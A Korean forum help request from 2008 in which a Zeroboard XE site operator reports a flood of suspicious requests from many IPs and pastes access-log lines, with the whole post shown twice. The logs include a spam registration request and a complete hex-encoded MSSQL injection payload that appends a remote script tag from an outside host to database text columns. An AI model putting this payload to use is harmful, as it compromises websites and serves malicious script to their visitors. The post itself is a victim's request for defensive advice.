묻고답하기
공격을 받는 것 같습니다.
2008.12.05 01:48
제로보드 xe 사용자입니다.
어제 밤에 늦게부터 갑자기 이상한 접속이 계속 들어오기 시작했습니다. 로그 내용을 보니 정상적인 접속이 아니라는 것은 분명하더군요.
대충 이렇습니다.
GET /zbxe/?mid=board_free&document_srl=3704965&page=&accept_agreement=&user_id=eEiZBaSXzuyTyCIF&password1=&password2=&user_name=Msadxfcz&nick_name=Msadxfcz&email_address=ermihgsg%40jpoblxse.com&homepage=http%3A%2F%2Fcodeine.cogiage.com%2Famben-plus-codeine-drug-interaction.html&blog=PMvJBaFlMBKqyPxgUIh&birthday=&allow_mailing=Y&open_sf=&sf=mfMiZrMJVQiCeUvpo&open_nateon=&nateon=vlQKdWLjkwHosAExZK&open_hobby=&hobby=GrcjrNrsUNmQedxkl&open_msn=&msn=ermihgsg%40jpoblxse.com HTTP/1.1" 200 80517
GET /zbxe/?document_srl=3391884';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);
분명히 정상적인 것은 아니고 아마도 '공격'이 아닐까 생각되는군요.
그런데 문제는 IP가 하나가 아니라는 것입니다. 그야말로 전세계... 대충 체크해본 IP 주소만 50개쯤은 되는데다 IP주소가 하나같이 일관성이 없습니다. (지역도 여기저기 무작위라고 할까요?)
일단 IP 차단이나 점검을 위하여 vhost 설정을 바꾸어 공사중 폴더(_contruction)만 나오도록 했더니 아예 이렇게 바뀌는군요.
GET /zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/?mid=club_trpg&document_srl=3403073&sort_index=voted_count&order_type=desc
GET /zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/files/attach/images/3617148/3617460/nostalghia_poster.jpg HTTP/1.1" 302 574
이를보면 봇이나 cgi로 보이는데 서버 운영에 대한 경험이 부족해서 해결 방법을 도저히 찾을 수가 없습니다.
그리하여 바로 지금 이 순간에도 무수한 접속이 들어오면서 로그를 무진장 늘려나가고 있습니다. 접속 차단 정도로는 의미가 없고....
어떻게 이런 상황이 생길 수 있는 것인지 도저히 알 수가 없군요.
제로보드의 내용을 분석해서 (이를테면 ?mid = 이라고 지정하지 해가면서) 부하를 늘려나가고 있는데, 혹시라도 이와 같은 문제를 겪으신 분이 계시는지요?
어찌할바를 모르기에 혹시라도 조언을 구할 수 있을까 문의해 봅니다.
참고로, 제로보드의 버젼은 1.1.1 입니다.
어제 밤에 늦게부터 갑자기 이상한 접속이 계속 들어오기 시작했습니다. 로그 내용을 보니 정상적인 접속이 아니라는 것은 분명하더군요.
대충 이렇습니다.
GET /zbxe/?mid=board_free&document_srl=3704965&page=&accept_agreement=&user_id=eEiZBaSXzuyTyCIF&password1=&password2=&user_name=Msadxfcz&nick_name=Msadxfcz&email_address=ermihgsg%40jpoblxse.com&homepage=http%3A%2F%2Fcodeine.cogiage.com%2Famben-plus-codeine-drug-interaction.html&blog=PMvJBaFlMBKqyPxgUIh&birthday=&allow_mailing=Y&open_sf=&sf=mfMiZrMJVQiCeUvpo&open_nateon=&nateon=vlQKdWLjkwHosAExZK&open_hobby=&hobby=GrcjrNrsUNmQedxkl&open_msn=&msn=ermihgsg%40jpoblxse.com HTTP/1.1" 200 80517
GET /zbxe/?document_srl=3391884';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);
분명히 정상적인 것은 아니고 아마도 '공격'이 아닐까 생각되는군요.
그런데 문제는 IP가 하나가 아니라는 것입니다. 그야말로 전세계... 대충 체크해본 IP 주소만 50개쯤은 되는데다 IP주소가 하나같이 일관성이 없습니다. (지역도 여기저기 무작위라고 할까요?)
일단 IP 차단이나 점검을 위하여 vhost 설정을 바꾸어 공사중 폴더(_contruction)만 나오도록 했더니 아예 이렇게 바뀌는군요.
GET /zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/?mid=club_trpg&document_srl=3403073&sort_index=voted_count&order_type=desc
GET /zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/_construction/zbxe/files/attach/images/3617148/3617460/nostalghia_poster.jpg HTTP/1.1" 302 574
이를보면 봇이나 cgi로 보이는데 서버 운영에 대한 경험이 부족해서 해결 방법을 도저히 찾을 수가 없습니다.
그리하여 바로 지금 이 순간에도 무수한 접속이 들어오면서 로그를 무진장 늘려나가고 있습니다. 접속 차단 정도로는 의미가 없고....
어떻게 이런 상황이 생길 수 있는 것인지 도저히 알 수가 없군요.
제로보드의 내용을 분석해서 (이를테면 ?mid = 이라고 지정하지 해가면서) 부하를 늘려나가고 있는데, 혹시라도 이와 같은 문제를 겪으신 분이 계시는지요?
어찌할바를 모르기에 혹시라도 조언을 구할 수 있을까 문의해 봅니다.
참고로, 제로보드의 버젼은 1.1.1 입니다.
